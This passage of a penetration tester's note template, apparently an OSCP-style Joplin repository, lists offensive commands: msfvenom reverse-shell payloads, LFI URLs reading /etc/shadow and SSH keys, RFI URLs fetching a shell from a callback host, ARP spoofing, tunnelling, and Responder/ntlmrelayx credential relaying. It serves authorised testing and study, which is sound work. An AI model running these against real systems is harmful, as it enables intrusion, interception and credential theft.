java/jsp_shell_reverse_tcp LHOST= LPORT= -f war > shell.war 64 | 65 | ## Scripting Payloads 66 | 67 | Python 68 | 69 | - msfvenom -p cmd/unix/reverse_python LHOST= LPORT= -f raw > shell.py 70 | 71 | Bash 72 | 73 | - msfvenom -p cmd/unix/reverse_bash LHOST= LPORT= -f raw > shell.sh 74 | 75 | Perl 76 | 77 | - msfvenom -p cmd/unix/reverse_perl LHOST= LPORT= -f raw > shell.pl 78 | 79 | 80 | Creating an Msfvenom Payload with an encoder while removing bad charecters: 81 | 82 | - msfvenom -p windows/shell_reverse_tcp EXITFUNC=process LHOST=IP LPORT=PORT -f c -e x86/shikata_ga_nai -b "\x0A\x0D" 83 | 84 | ## Resources: 85 | 86 | - https://hacker.house/lab/windows-defender-bypassing-for-meterpreter/ -------------------------------------------------------------------------------- /Markdown_Versions/Pentest_Template_Master_1.0/Pentest Template Master 1.0/2. Enumeration/Services/1. Web/General Notes.md: -------------------------------------------------------------------------------- 1 | 2 | ## Step 1: ALWAYS LOOK AT THE SOURCE CODE OF THE WEBPAGE! 3 | 4 | 5 | ## Web App Scanners 6 | 7 | Nikto: 8 | 9 | - nikto --url 10 | 11 | Wpscan: 12 | 13 | - wpscan --url 14 | - wpscan --url --enumerate ap at (All Plugins, All Themes) 15 | - wpscan --url --enumerate u (Usernames) 16 | - wpscan --url --enumerate v 17 | 18 | Web Tools for Directory Scanning: 19 | 20 | Dirb: 21 | 22 | - dirb 23 | - dirb 24 | 25 | Gobuster: 26 | 27 | - gobuster -u -w /usr/share/wordlists/ 28 | - gobuster -u -w /usr/share/wordlists/ -a Firefox (Custom Agent) 29 | - gobuster -u -w /usr/share/wordlists/ -x .php,.txt,.html 30 | - gobuster -u -w /usr/share/wordlists/ -x .php,.txt,.html -s "200" 31 | - gobuster -e -u -w /usr/share/wordlists/ -x .php,.txt,.html -s "200" 32 | - gobuster -v -e -u -w /usr/share/wordlists/ -x .php,.txt,.html -s "200" 33 | - gobuster -v -e -u -w /usr/share/wordlists/ -x .php,.txt,.html -s "200" -o output.txt 34 | - gobuster -s 200,204,301,302,307,403 -u 172.21.0.0 -w /usr/share/seclists/Discovery/Web_Content/big.txt -t 80 -a 'Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0' 35 | 36 | Wfuzz: 37 | 38 | - wfuzz -w wordlist/general/common.txt http://testphp.vulnweb.com/FUZZ 39 | - wfuzz -z range,0-10 --hl 97 http://testphp.vulnweb.com/listproducts.php?cat=FUZZ 40 | - wfuzz -z file,wordlist/others/common_pass.txt -d "uname=FUZZ&pass=FUZZ" --hc 302 http://testphp.vulnweb.com/userinfo.php (Post Requests) 41 | 42 | - wfuzz -z file,wordlist/general/common.txt -b cookie=value1 -b cookie2=value2 http://testphp.vulnweb.com/FUZZ (Fuzzing Cookies) 43 | 44 | Dirsearch: 45 | 46 | - dirsearch /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u 172.21.0.0 -e php 47 | 48 | 49 | Other Tools: 50 | - Burp Suite 51 | - OWASP Zap 52 | - Cadaver 53 | - SQLMap 54 | - Joomscan 55 | 56 | 57 | ## Testing for LFI: 58 | 59 | https://www.exploit-db.com/docs/english/40992-web-app-penetration-testing---local-file-inclusion-(lfi).pdf 60 | 61 | Examples: 62 | 63 | http://example.com/index.php?page=etc/passwd 64 | http://example.com/index.php?page=etc/passwd%00 65 | http://example.com/index.php?page=../../etc/passwd 66 | http://example.com/index.php?page=%252e%252e%252f 67 | http://example.com/index.php?page=....//....//etc/passwd 68 | 69 | Interesting Files: 70 | 71 | Linux: 72 | /etc/passwd 73 | /etc/shadow 74 | /etc/issue 75 | /etc/group 76 | /etc/hostname 77 | /etc/ssh/ssh_config 78 | /etc/ssh/sshd_config 79 | /root/.ssh/id_rsa 80 | /root/.ssh/authorized_keys 81 | /home/user/.ssh/authorized_keys 82 | /home/user/.ssh/id_rsa 83 | 84 | Windows: 85 | 86 | Windows: 87 | /boot.ini 88 | /autoexec.bat 89 | /windows/system32/drivers/etc/hosts 90 | /windows/repair/SAM 91 | 92 | 93 | 94 | ## Testing for RFI: 95 | 96 | http://example.com/index.php?page=http://callback.com/shell.txt 97 | http://example.com/index.php?page=http://callback.com/shell.txt%00 98 | http://example.com/index.php?page=http:%252f%252fcallback.com%252fshell.txt 99 | 100 | ## Resources 101 | 102 | - Turning LFI to RFI: https://l.avala.mp/?p=241 -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Project TJ-JPT 2 | 3 | ## Release Date 4 | May 8th 2020 5 | 6 | ## Introduction 7 | As a pentester, there are many great resources, cheat sheets, and guidelines that contain a large amount of valuable 8 | information. However, it can be frustrating and time-consuming to find these notes or resources that are scattered all 9 | over the place. Not to mention the large amount of notes you have stored locally across your system with several 10 | different note-taking tools. In addition, some pentesters could be in assessments that are in a closed environment 11 | making it more challenging to transfer there notes and files on their devices. That's when I found [Joplin][Joplin] 12 | to be able to suit my needs when I am on engagements. 13 | 14 | ## A Word of Advice: 15 | This template contains a variety of tools, commands, and resources that I reference from to use for certain cases when 16 | I am on an engagement. However, it is important that you learn about these tools and understand the references being 17 | used! Take some time to look over the resources I put in before you start running these tools or commands blindly. If 18 | the tool or command does not work the way it should, then take a step back and troubleshoot it. **Critical thinking** 19 | is a necessary skill that all pentesters need to have when they are assessing a variety of options to make a better 20 | informed decision. 21 | 22 | ## Features with Joplin: 23 | - Notes can be searchable, copied, tagged, and modified either from the applications directly or from your text editor. 24 | - Markdown Editor and Reader. Easy to import and export notes to multiple formats. 25 | - [WebClipper][WebClipper] to save web pages and screenshot from Firefox and Chrome Browser 26 | - Sync notes on various cloud applications such as NextCloud, Dropbox, OneDrive 27 | - Sync notes on a local file share or WebDav. 28 | - Compatible to work on Windows, Linux, macOS, iOS, and Android 29 | 30 | ## What does the template include? 31 | - Command line references. 32 | - Personal notes that I left as reminders when I am assessing a target. 33 | - PWK Report in Markdown (Can be exported into a `PDF`) 34 | 35 | ## Instructions 36 | **NOTE:** You must have Joplin installed on your system. 37 | 1. Open Joplin 38 | 2. Click File and select `Import` 39 | 3. Select `JEX - Joplin Export File` 40 | 4. Locate the pentest template and it should appear in Joplin 41 | 42 | ## Feedback, Suggestions and Contributions 43 | Although this template is just the start there can always be room to add new tips, resources, or guides for other 44 | people to use in this template. Feel free to post any suggestions that you may have or want to include by submitting 45 | an issue in the repo. 46 | 47 | ## Credit 48 | - A huge shout out goes to [James Hall][James Hall] originally creating his own pentesting template in Cherry Tree 49 | that inspired me to build mine in Joplin. You can find it [here][Github]. 50 | - [Offensive Security][Offensive Security]: For reviewing the template and giving me feedback on things to 51 | add/improve on the template. 52 | - The developers at [Joplin][Joplin] for making an awesome opensource note-taking tool. 53 | 54 | [Joplin]: https://joplinapp.org/ 55 | [WebClipper]: https://joplinapp.org/clipper/ 56 | [James Hall]: https://twitter.com/411Hall 57 | [Github]: https://411hall.github.io/OSCP-Preparation/ 58 | [Offensive Security]: https://www.offensive-security.com/ 59 | -------------------------------------------------------------------------------- /Markdown_Versions/Pentest_Template_Master_3.0/Pentest Template Master 3.0/1. Recon Notes/Pivoting_Tunneling.md: -------------------------------------------------------------------------------- 1 | # Check if your tunnel is active and running: 2 | 3 | - nc -z localhost || echo 'no tunnel open' 4 | - netstat -lpnt | grep | grep ssh 5 | - ps aux | grep ssh 6 | - ss -ntlp 7 | 8 | # SSH Tunneling 9 | 10 | Note: Target must have SSH running for there service 11 | 12 | 1. Create SSH Tunnel: ssh -D localhost: -f -N user@localhost -p 13 | 2. Setup ProxyChains. Edit the following config file (/etc/proxychains.conf) 14 | 3. Add the following line into the config: Socks5 127.0.0.1 15 | 4. Run commands through the tunnel: proxychains 16 | 17 | ## SShuttle 18 | 19 | In Kali 20 | 21 | Source: https://github.com/sshuttle/sshuttle 22 | 23 | - sshuttle -r root@172.21.0.0 10.2.2.0/24 24 | 25 | 26 | # Meterpreter 27 | 28 | Use only if you have a meterpreter shell and you need to pivot to another network. 29 | 30 | ## Portfwd 31 | 32 | - meterpreter > portfwd add -l 80 -r 172.21.0.0 -p 80 33 | 34 | ## Autoroute 35 | In Metasploit 36 | 1. use post/multi/manage/autoroute 37 | ``` 38 | msf5 post(multi/manage/autoroute) > options 39 | 40 | Module options (post/multi/manage/autoroute): 41 | 42 | Name Current Setting Required Description 43 | ---- --------------- -------- ----------- 44 | CMD autoadd yes Specify the autoroute command (Accepted: add, autoadd, print, delete, default) 45 | NETMASK 255.255.255.0 no Netmask (IPv4 as "255.255.255.0" or CIDR as "/24" 46 | SESSION yes The session to run this module on. 47 | SUBNET no Subnet (IPv4, for example, 10.10.10.0) 48 | 49 | msf5 post(multi/manage/autoroute) > 50 | ``` 51 | 2. set session 52 | 3. run 53 | 54 | ## Metasploit Socks Proxy 55 | 56 | 1 auxiliary/server/socks4a normal No Socks4a Proxy Server 57 | 2 auxiliary/server/socks5 normal No Socks5 Proxy Server 58 | 3 auxiliary/server/socks_unc normal No SOCKS Proxy UNC Path Redirection 59 | 60 | ## Port Forwarder 61 | 1. mknod pivot p 62 | 2. nc -l -p < port to listen on> 0 1>pivot 63 | 64 | # Cntlm 65 | 66 | apt install cntlm 67 | 68 | 1. cntlm -u username@breakme.local -I proxy 69 | 2. export http://127.0.0.1:3128, export https://127.0.0.1:3128 70 | 3. Accessing with browser: chromium --proxy-server="http://127.0.0.1:3128" 71 | 72 | # netsh port forwarding 73 | - netsh interface portproxy add v4tov4 listenaddress=127.0.0.1 listenport=9000 connectaddress=192.168.0.10 connectport=80 74 | - netsh interface portproxy delete v4tov4 listenaddress=127.0.0.1 listenport=9000 75 | 76 | 77 | # Proxy Binaries for Windows 78 | Windows 10 has SSH (Thanks WSL!) 79 | plink.exe (In Kali) 80 | 81 | # Other Tools: 82 | - ssf: https://github.com/securesocketfunneling/ssf 83 | - rpivot: https://github.com/klsecservices/rpivot 84 | - hans (ICMP Tunneling): http://code.gerade.org/hans/ 85 | - Iodine (ICMP Tunneling over DNS): https://code.kryo.se/iodine/ 86 | - Dnscat2: https://github.com/iagox86/dnscat2 87 | - Chisel: https://github.com/jpillora/chisel 88 | - httptunnel: In Kali apt install httptunnel 89 | - ligolo: https://github.com/sysdream/ligolo 90 | - reGeorg: https://github.com/sensepost/reGeorg 91 | 92 | 93 | 94 | # Other Resources: 95 | 96 | - https://0xdf.gitlab.io/2019/01/28/pwk-notes-tunneling-update1.html 97 | - https://highon.coffee/blog/ssh-meterpreter-pivoting-techniques/ 98 | - https://medium.com/maverislabs/proxyjump-the-ssh-option-you-probably-never-heard-of-2d7e41d43464 99 | 100 | -------------------------------------------------------------------------------- /Markdown_Versions/Pentest_Template_Master_2.0/Pentest Template Master 2.0/Pivoting_Tunneling.md: -------------------------------------------------------------------------------- 1 | # Check if your tunnel is active and running: 2 | 3 | - nc -z localhost || echo 'no tunnel open' 4 | - netstat -lpnt | grep | grep ssh 5 | - ps aux | grep ssh 6 | 7 | 8 | 9 | # SSH Tunneling 10 | 11 | 12 | Note: Target must have SSH running for there service 13 | 14 | 1. Create SSH Tunnel: ssh -D localhost: -f -N user@localhost -p 15 | 2. Setup ProxyChains. Edit the following config file (/etc/proxychains.conf) 16 | 3. Add the following line into the config: Socks5 127.0.0.1 17 | 4. Run commands through the tunnel: proxychains 18 | 19 | ## SShuttle 20 | 21 | In Kali 22 | 23 | Source: https://github.com/sshuttle/sshuttle 24 | 25 | - sshuttle -r root@172.21.0.0 10.2.2.0/24 26 | 27 | 28 | # Meterpreter 29 | 30 | Use only if you have a meterpreter shell and you need to pivot to another network. 31 | 32 | ## Portfwd 33 | 34 | - meterpreter > portfwd add -l 80 -r 172.21.0.0 -p 80 35 | 36 | ## Autoroute 37 | In Metasploit 38 | 1. use post/multi/manage/autoroute 39 | ``` 40 | msf5 post(multi/manage/autoroute) > options 41 | 42 | Module options (post/multi/manage/autoroute): 43 | 44 | Name Current Setting Required Description 45 | ---- --------------- -------- ----------- 46 | CMD autoadd yes Specify the autoroute command (Accepted: add, autoadd, print, delete, default) 47 | NETMASK 255.255.255.0 no Netmask (IPv4 as "255.255.255.0" or CIDR as "/24" 48 | SESSION yes The session to run this module on. 49 | SUBNET no Subnet (IPv4, for example, 10.10.10.0) 50 | 51 | msf5 post(multi/manage/autoroute) > 52 | ``` 53 | 2. set session 54 | 3. run 55 | 56 | ## Metasploit Socks Proxy 57 | 58 | 1 auxiliary/server/socks4a normal No Socks4a Proxy Server 59 | 2 auxiliary/server/socks5 normal No Socks5 Proxy Server 60 | 3 auxiliary/server/socks_unc normal No SOCKS Proxy UNC Path Redirection 61 | 62 | # Ncat 63 | 64 | ## Http Proxy 65 | - ncat -vv --listen 3128 --proxy-type http 66 | 67 | ## Port Forwarder 68 | 1. mknod pivot p 69 | 2. nc -l -p < port to listen on> 0 1>pivot 70 | 71 | # Cntlm 72 | 73 | apt install cntlm 74 | 75 | 1. cntlm -u username@breakme.local -I proxy 76 | 2. export http://127.0.0.1:3128, export https://127.0.0.1:3128 77 | 3. Accessing with browser: chromium --proxy-server="http://127.0.0.1:3128" 78 | 79 | # netsh port forwarding 80 | - netsh interface portproxy add v4tov4 listenaddress=127.0.0.1 listenport=9000 connectaddress=192.168.0.10 connectport=80 81 | - netsh interface portproxy delete v4tov4 listenaddress=127.0.0.1 listenport=9000 82 | 83 | 84 | # Proxy Binaries for Windows 85 | Windows 10 has SSH (Thanks WSL!) 86 | plink.exe (In Kali) 87 | 88 | # Other Tools: 89 | - ssf: https://github.com/securesocketfunneling/ssf 90 | - rpivot: https://github.com/klsecservices/rpivot 91 | - hans (ICMP Tunneling): http://code.gerade.org/hans/ 92 | - Iodine (ICMP Tunneling over DNS): https://code.kryo.se/iodine/ 93 | - Dnscat2: https://github.com/iagox86/dnscat2 94 | - Chisel: https://github.com/jpillora/chisel 95 | - httptunnel: In Kali apt install httptunnel 96 | - ligolo: https://github.com/sysdream/ligolo 97 | - reGeorg: https://github.com/sensepost/reGeorg 98 | - 99 | 100 | 101 | # Other Resources: 102 | 103 | - https://0xdf.gitlab.io/2019/01/28/pwk-notes-tunneling-update1.html 104 | - https://highon.coffee/blog/ssh-meterpreter-pivoting-techniques/ 105 | - https://medium.com/maverislabs/proxyjump-the-ssh-option-you-probably-never-heard-of-2d7e41d43464 106 | 107 | -------------------------------------------------------------------------------- /Markdown_Versions/Pentest_Template_Master_3.0/Pentest Template Master 3.0/1. Recon Notes/Discovery Scans/Network Discovery Scans.md: -------------------------------------------------------------------------------- 1 | # NetDiscover (ARP Scanning): 2 | - netdiscover -i eth0 3 | - netdiscover -r 172.21.10.0/24 4 | 5 | # Dsniff Arpspoof 6 | 7 | First enable Linux box to act as a router: 8 | 9 | `echo 1 > /proc/sys/net/ipv4/ip_forward` 10 | 11 | Then run `arpspoof`: 12 | 13 | `arpspoof -i -t -r ` 14 | 15 | For example, to intercept traffic between targets, use: 16 | 17 | `arpspoof -i eth0 -t 192.168.4.11 -r 192.168.4.16` 18 | 19 | # Nmap: 20 | 21 | - nmap -sn 172.21.10.0/24 22 | - nmap -sn 172.21.10.1-253 23 | - nmap -sn 172.21.10.* 24 | 25 | You can also grep out the IPs and cut out fluf: 26 | ``` 27 | nmap -sn 172.x.x.x/24 | grep "172" | cut -f 5 -d ' ' 28 | ``` 29 | 30 | A slower, more stealthier approach that utilizes the files containing the IP address split (as seen in the first section above) would be: 31 | ``` 32 | nmap --randomize-hosts -sn -T2 -oN nmap_discoveryScan_x.x.x.x-16.txt -iL x.x.x.x_IP_range.split.txt 33 | ``` 34 | This will export the results into a text file (`-oN`). Randomized hosts is optional, depending on the customer and the testing situation. The flag, `-oA`, can be used in place of `-oX` or `-oN`, as `-oA` will output the results to all output formats. 35 | 36 | The results for both command options shown above will be the list of hosts that responded to the ping, thus are up and alive. 37 | 38 | # Nbtscan: 39 | - nbtscan -r 172.21.1.0/24 40 | 41 | # Masscan 42 | - masscan 172.21.10.0/24 --ping 43 | 44 | # Ping Sweeps 45 | 46 | ## Linux Ping Sweep (Bash) 47 | 48 | - for i in {1..254} ;do (ping -c 1 172.21.10.$i | grep "bytes from" &) ;done 49 | 50 | ## Windows Ping Sweep (Run on Windows System) 51 | 52 | - for /L %i in (1,1,255) do @ping -n 1 -w 200 172.21.10.%i > nul && echo 172.21.1.%i is up. 53 | 54 | ## Powershell Ping Sweep: 55 | Note: This command can also run on powershell for Linux 56 | 57 | - 1..20 | % {"172.21.10.$($_): $(Test-Connection -count 1 -comp 172.21.10.$($_) -quiet)"} 58 | - Get-PingSweep Subnet 172.21.10 59 | ``` 60 | # Reference: https://gist.github.com/joegasper/93ff8ae44fa8712747d85aa92c2b4c78 61 | function ResolveIp($IpAddress) { 62 | try { 63 | (Resolve-DnsName $IpAddress -QuickTimeout -ErrorAction SilentlyContinue).NameHost 64 | } catch { 65 | $null 66 | } 67 | } 68 | 69 | function Invoke-PingSweep { 70 | [CmdletBinding()] 71 | Param( 72 | [Parameter(Mandatory=$true)] 73 | [string]$SubNet, 74 | [switch]$ResolveName 75 | ) 76 | $ips = 1..254 | ForEach-Object {"$($SubNet).$_"} 77 | $ps = foreach ($ip in $ips) { 78 | (New-Object Net.NetworkInformation.Ping).SendPingAsync($ip, 250) 79 | #[Net.NetworkInformation.Ping]::New().SendPingAsync($ip, 250) # or if on PowerShell v5 80 | } 81 | [Threading.Tasks.Task]::WaitAll($ps) 82 | $ps.Result | Where-Object -FilterScript {$_.Status -eq 'Success' -and $_.Address -like "$subnet*"} 83 | Select-Object Address,Status,RoundtripTime -Unique | 84 | ForEach-Object { 85 | if ($_.Status -eq 'Success') { 86 | if (!$ResolveName) { 87 | $_ 88 | } else { 89 | $_ | Select-Object Address, @{Expression={ResolveIp($_.Address)};Label='Name'}, Status, RoundtripTime 90 | } 91 | } 92 | } 93 | } 94 | ``` 95 | 96 | ## Python Ping Sweep: 97 | 98 | The following python script can be used to perform a ping scan. 99 | ``` 100 | #!/usr/bin/env python3 101 | import ipaddress 102 | from subprocess import Popen, DEVNULL 103 | 104 | for ping in range(1, 254): 105 | address = "x.x.x.%d" % ping 106 | response = Popen(["ping", "-c1", address], stdout=DEVNULL) 107 | output = response.communicate()[0] 108 | val1 = response.returncode 109 | if val1 == 0: 110 | print(address) 111 | ``` 112 | This script is specifically used for a /24 network. Modification required for other network types. -------------------------------------------------------------------------------- /Markdown_Versions/Pentest_Template_Master_3.0/Pentest Template Master 3.0/3. Enumeration Notes/Responder.md: -------------------------------------------------------------------------------- 1 | # Source: 2 | 3 | https://github.com/lgandx/Responder 4 | 5 | # Tools in Responder: 6 | 7 | Location: /usr/share/Responder/tools 8 | 9 | # Make changes to config to turn off services: 10 | 11 | `nano /usr/share/responder/Responder.conf` 12 | 13 | # Configuring MultiRelay: 14 | In Kali Linux: 15 | 1. pip install pycryptodome 16 | 2. Install Mingw and create multi relay binaries: 17 | ``` 18 | sudo apt-get install gcc-mingw-w64-x86-64 19 | sudo x86_64-w64-mingw32-gcc ./MultiRelay/bin/Runas.c -o ./MultiRelay/bin/Runas.exe -municode -lwtsapi32 -luserenv 20 | sudo x86_64-w64-mingw32-gcc ./MultiRelay/bin/Syssvc.c -o ./MultiRelay/bin/Syssvc.exe -municode 21 | ``` 22 | 4. python3 MultiRelay.py 23 | ``` 24 | Usage: 25 | responder-MultiRelay -t 10.20.30.40 -u Administrator lgandx admin 26 | responder-MultiRelay -t 10.20.30.40 -u ALL 27 | 28 | Options: 29 | --version show program's version number and exit 30 | -h, --help show this help message and exit 31 | -t 10.20.30.45 Target server for SMB relay. 32 | -p 8081 Additional port to listen on, this will relay for 33 | proxy, http and webdav incoming packets. 34 | -u, --UserToRelay Users to relay. Use '-u ALL' to relay all users. 35 | -c whoami, --command=whoami 36 | Single command to run (scripting) 37 | -d, --dump Dump hashes (scripting) 38 | ``` 39 | 40 | 41 | # Starting Responder: 42 | 43 | - responder -I [Interface] -A 44 | - responder -I [Interface] -i [IP Address] or -e [External IP] -A 45 | 46 | ## Starting Responder in Basic Authentication Mode 47 | - responder -I [Interface] -wdF -b 48 | 49 | ## Force NTLM Authentication to version 1 instead of version 2: 50 | - responder -I [Interface] -wdF --lm --disable-ess 51 | 52 | ## External IP Poisoning 53 | - responder -I [Interface] -e 172.21.1.2 54 | 55 | ## DNS Injection in DHCP Responses 56 | - responder -i [interface] -D 57 | 58 | # Using Responder-RunFinger to verify if SMB Signing is not enabled 59 | 60 | - responder-RunFinger -i 172.21.0.0/24 61 | - python3 RunFinger.py -i 172.21.0.0/24 62 | 63 | # Using Responder-MultiRelay 64 | Tips: 65 | Multirelay uses the default version of mimikatz and it can easily flagged by AV. It is recommend to compile your own custom version and use it with mutlirelay. 66 | Do not run multirelay against targets that have smb message_signing enabled: 67 | 68 | - responder-Multirelay -t 172.21.0.0 - u ALL 69 | - python3 Multirelay.py -t 172.21.0.0 -u ALL 70 | 71 | # Using Responder with Impacket-Ntlmrelayx 72 | NtlmRelayX is an impacket script that allows you to conduct NTLM Relay Attacks, by creating an SMB and HTTP server and relaying credentials to various different protocols (SMB, HTTP, LDAP, etc.). 73 | 74 | 1. When you are using responder to capture challenges and relay them to ntlmrelayx you will need to turn off HTTP and SMB in the responder.conf file. Also have a list of what systems are running smb and have smb signing disabled. 75 | 76 | 2. Set up a socks proxy on port 1080. This socks proxy will successfully relay the traffic to ntlmrelayx. 77 | - sudo nano /etc/proxychains4.conf 78 | ``` 79 | [ProxyList] 80 | # NtlmRelayX Socks Proxy 81 | socks4 127.0.0.1 1080 82 | # Other Proxies 83 | ``` 84 | 3. Run Responder and NtlmRelayX to watch the magic happen: 85 | - sudo Responder -I [Interface] 86 | - impacket-ntlmrelayx -socks -smb2support -tf smb-targets.txt 87 | - ntlmrelayx.py -socks -smb2support -tf smb-targets.txt 88 | 89 | To view a full list of captured sessions from NtlmRelayX 90 | ``` 91 | ntlmrelayx> socks 92 | Protocol Target Username Port 93 | -------- -------------- ------------------------ ---- 94 | SMB 172.21.48.38 SPAWN/MSIMMONS 445 95 | SMB 172.21.48.230 FAERIE/ADMINISTRATOR 445 96 | SMB 172.21.48.230 FAERIE/ALSIMMONS 445 97 | ``` 98 | 99 | # References: 100 | 101 | - https://github.com/lgandx/Responder 102 | 103 | 104 | --------------------------------------------------------------------------------